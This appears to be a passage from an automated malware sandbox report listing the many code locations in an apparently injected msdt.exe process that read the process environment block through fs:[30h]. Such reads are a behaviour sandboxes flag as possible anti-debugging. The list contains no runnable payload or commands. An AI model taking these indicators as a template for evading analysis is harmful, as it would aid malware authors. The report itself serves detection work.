          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6C0A mov eax, dword ptr fs:[00000030h]13_2_047A6C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]13_2_047F740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]13_2_047F740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F740D mov eax, dword ptr fs:[00000030h]13_2_047F740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1C06 mov eax, dword ptr fs:[00000030h]13_2_047E1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E14FB mov eax, dword ptr fs:[00000030h]13_2_047E14FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]13_2_047A6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]13_2_047A6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6CF0 mov eax, dword ptr fs:[00000030h]13_2_047A6CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8CD6 mov eax, dword ptr fs:[00000030h]13_2_047F8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473849B mov eax, dword ptr fs:[00000030h]13_2_0473849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C577 mov eax, dword ptr fs:[00000030h]13_2_0474C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C577 mov eax, dword ptr fs:[00000030h]13_2_0474C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04747D50 mov eax, dword ptr fs:[00000030h]13_2_04747D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04763D43 mov eax, dword ptr fs:[00000030h]13_2_04763D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3540 mov eax, dword ptr fs:[00000030h]13_2_047A3540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AD30 mov eax, dword ptr fs:[00000030h]13_2_0472AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04733D34 mov eax, dword ptr fs:[00000030h]13_2_04733D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EE539 mov eax, dword ptr fs:[00000030h]13_2_047EE539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8D34 mov eax, dword ptr fs:[00000030h]13_2_047F8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047AA537 mov eax, dword ptr fs:[00000030h]13_2_047AA537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]13_2_04754D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]13_2_04754D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04754D3B mov eax, dword ptr fs:[00000030h]13_2_04754D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047D8DF1 mov eax, dword ptr fs:[00000030h]13_2_047D8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0 mov eax, dword ptr fs:[00000030h]13_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473D5E0 mov eax, dword ptr fs:[00000030h]13_2_0473D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EFDE2 mov eax, dword ptr fs:[00000030h]13_2_047EFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov ecx, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A6DC9 mov eax, dword ptr fs:[00000030h]13_2_047A6DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]13_2_04751DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]13_2_04751DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04751DB5 mov eax, dword ptr fs:[00000030h]13_2_04751DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F05AC mov eax, dword ptr fs:[00000030h]13_2_047F05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F05AC mov eax, dword ptr fs:[00000030h]13_2_047F05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047535A1 mov eax, dword ptr fs:[00000030h]13_2_047535A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FD9B mov eax, dword ptr fs:[00000030h]13_2_0475FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475FD9B mov eax, dword ptr fs:[00000030h]13_2_0475FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752581 mov eax, dword ptr fs:[00000030h]13_2_04752581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04722D8A mov eax, dword ptr fs:[00000030h]13_2_04722D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474AE73 mov eax, dword ptr fs:[00000030h]13_2_0474AE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473766D mov eax, dword ptr fs:[00000030h]13_2_0473766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04737E41 mov eax, dword ptr fs:[00000030h]13_2_04737E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAE44 mov eax, dword ptr fs:[00000030h]13_2_047EAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAE44 mov eax, dword ptr fs:[00000030h]13_2_047EAE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DFE3F mov eax, dword ptr fs:[00000030h]13_2_047DFE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472E620 mov eax, dword ptr fs:[00000030h]13_2_0472E620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A61C mov eax, dword ptr fs:[00000030h]13_2_0475A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A61C mov eax, dword ptr fs:[00000030h]13_2_0475A61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]13_2_0472C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]13_2_0472C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C600 mov eax, dword ptr fs:[00000030h]13_2_0472C600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04758E00 mov eax, dword ptr fs:[00000030h]13_2_04758E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E1608 mov eax, dword ptr fs:[00000030h]13_2_047E1608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047376E2 mov eax, dword ptr fs:[00000030h]13_2_047376E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047516E0 mov ecx, dword ptr fs:[00000030h]13_2_047516E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8ED6 mov eax, dword ptr fs:[00000030h]13_2_047F8ED6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04768EC7 mov eax, dword ptr fs:[00000030h]13_2_04768EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047536CC mov eax, dword ptr fs:[00000030h]13_2_047536CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DFEC0 mov eax, dword ptr fs:[00000030h]13_2_047DFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]13_2_047F0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]13_2_047F0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F0EA5 mov eax, dword ptr fs:[00000030h]13_2_047F0EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A46A7 mov eax, dword ptr fs:[00000030h]13_2_047A46A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFE87 mov eax, dword ptr fs:[00000030h]13_2_047BFE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473FF60 mov eax, dword ptr fs:[00000030h]13_2_0473FF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8F6A mov eax, dword ptr fs:[00000030h]13_2_047F8F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473EF40 mov eax, dword ptr fs:[00000030h]13_2_0473EF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475E730 mov eax, dword ptr fs:[00000030h]13_2_0475E730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04724F2E mov eax, dword ptr fs:[00000030h]13_2_04724F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04724F2E mov eax, dword ptr fs:[00000030h]13_2_04724F2E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474F716 mov eax, dword ptr fs:[00000030h]13_2_0474F716
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFF10 mov eax, dword ptr fs:[00000030h]13_2_047BFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BFF10 mov eax, dword ptr fs:[00000030h]13_2_047BFF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F070D mov eax, dword ptr fs:[00000030h]13_2_047F070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F070D mov eax, dword ptr fs:[00000030h]13_2_047F070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A70E mov eax, dword ptr fs:[00000030h]13_2_0475A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A70E mov eax, dword ptr fs:[00000030h]13_2_0475A70E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047637F5 mov eax, dword ptr fs:[00000030h]13_2_047637F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04738794 mov eax, dword ptr fs:[00000030h]13_2_04738794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]13_2_047A7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]13_2_047A7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7794 mov eax, dword ptr fs:[00000030h]13_2_047A7794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F1074 mov eax, dword ptr fs:[00000030h]13_2_047F1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047E2073 mov eax, dword ptr fs:[00000030h]13_2_047E2073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04740050 mov eax, dword ptr fs:[00000030h]13_2_04740050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04740050 mov eax, dword ptr fs:[00000030h]13_2_04740050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475002D mov eax, dword ptr fs:[00000030h]13_2_0475002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473B02A mov eax, dword ptr fs:[00000030h]13_2_0473B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F4015 mov eax, dword ptr fs:[00000030h]13_2_047F4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F4015 mov eax, dword ptr fs:[00000030h]13_2_047F4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]13_2_047A7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]13_2_047A7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A7016 mov eax, dword ptr fs:[00000030h]13_2_047A7016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047258EC mov eax, dword ptr fs:[00000030h]13_2_047258EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov ecx, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047BB8D0 mov eax, dword ptr fs:[00000030h]13_2_047BB8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov ecx, dword ptr fs:[00000030h]13_2_0475F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov eax, dword ptr fs:[00000030h]13_2_0475F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475F0BF mov eax, dword ptr fs:[00000030h]13_2_0475F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047520A0 mov eax, dword ptr fs:[00000030h]13_2_047520A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047690AF mov eax, dword ptr fs:[00000030h]13_2_047690AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729080 mov eax, dword ptr fs:[00000030h]13_2_04729080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3884 mov eax, dword ptr fs:[00000030h]13_2_047A3884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A3884 mov eax, dword ptr fs:[00000030h]13_2_047A3884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B171 mov eax, dword ptr fs:[00000030h]13_2_0472B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B171 mov eax, dword ptr fs:[00000030h]13_2_0472B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472C962 mov eax, dword ptr fs:[00000030h]13_2_0472C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474B944 mov eax, dword ptr fs:[00000030h]13_2_0474B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474B944 mov eax, dword ptr fs:[00000030h]13_2_0474B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475513A mov eax, dword ptr fs:[00000030h]13_2_0475513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475513A mov eax, dword ptr fs:[00000030h]13_2_0475513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov eax, dword ptr fs:[00000030h]13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04744120 mov ecx, dword ptr fs:[00000030h]13_2_04744120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]13_2_04729100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]13_2_04729100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729100 mov eax, dword ptr fs:[00000030h]13_2_04729100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047B41E8 mov eax, dword ptr fs:[00000030h]13_2_047B41E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]13_2_0472B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]13_2_0472B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472B1E1 mov eax, dword ptr fs:[00000030h]13_2_0472B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]13_2_047A51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]13_2_047A51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]13_2_047A51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A51BE mov eax, dword ptr fs:[00000030h]13_2_047A51BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047561A0 mov eax, dword ptr fs:[00000030h]13_2_047561A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047561A0 mov eax, dword ptr fs:[00000030h]13_2_047561A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047A69A6 mov eax, dword ptr fs:[00000030h]13_2_047A69A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752990 mov eax, dword ptr fs:[00000030h]13_2_04752990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0475A185 mov eax, dword ptr fs:[00000030h]13_2_0475A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0474C182 mov eax, dword ptr fs:[00000030h]13_2_0474C182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476927A mov eax, dword ptr fs:[00000030h]13_2_0476927A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DB260 mov eax, dword ptr fs:[00000030h]13_2_047DB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047DB260 mov eax, dword ptr fs:[00000030h]13_2_047DB260
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047F8A62 mov eax, dword ptr fs:[00000030h]13_2_047F8A62
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EEA55 mov eax, dword ptr fs:[00000030h]13_2_047EEA55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047B4257 mov eax, dword ptr fs:[00000030h]13_2_047B4257
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]13_2_04729240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]13_2_04729240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]13_2_04729240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04729240 mov eax, dword ptr fs:[00000030h]13_2_04729240
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04764A2C mov eax, dword ptr fs:[00000030h]13_2_04764A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04764A2C mov eax, dword ptr fs:[00000030h]13_2_04764A2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]13_2_04725210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov ecx, dword ptr fs:[00000030h]13_2_04725210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]13_2_04725210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04725210 mov eax, dword ptr fs:[00000030h]13_2_04725210
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AA16 mov eax, dword ptr fs:[00000030h]13_2_0472AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0472AA16 mov eax, dword ptr fs:[00000030h]13_2_0472AA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04743A1C mov eax, dword ptr fs:[00000030h]13_2_04743A1C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAA16 mov eax, dword ptr fs:[00000030h]13_2_047EAA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047EAA16 mov eax, dword ptr fs:[00000030h]13_2_047EAA16
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04738A0A mov eax, dword ptr fs:[00000030h]13_2_04738A0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752AE4 mov eax, dword ptr fs:[00000030h]13_2_04752AE4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04752ACB mov eax, dword ptr fs:[00000030h]13_2_04752ACB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0473AAB0 mov eax, dword ptr fs:[00000030h]13_2_0473AAB0
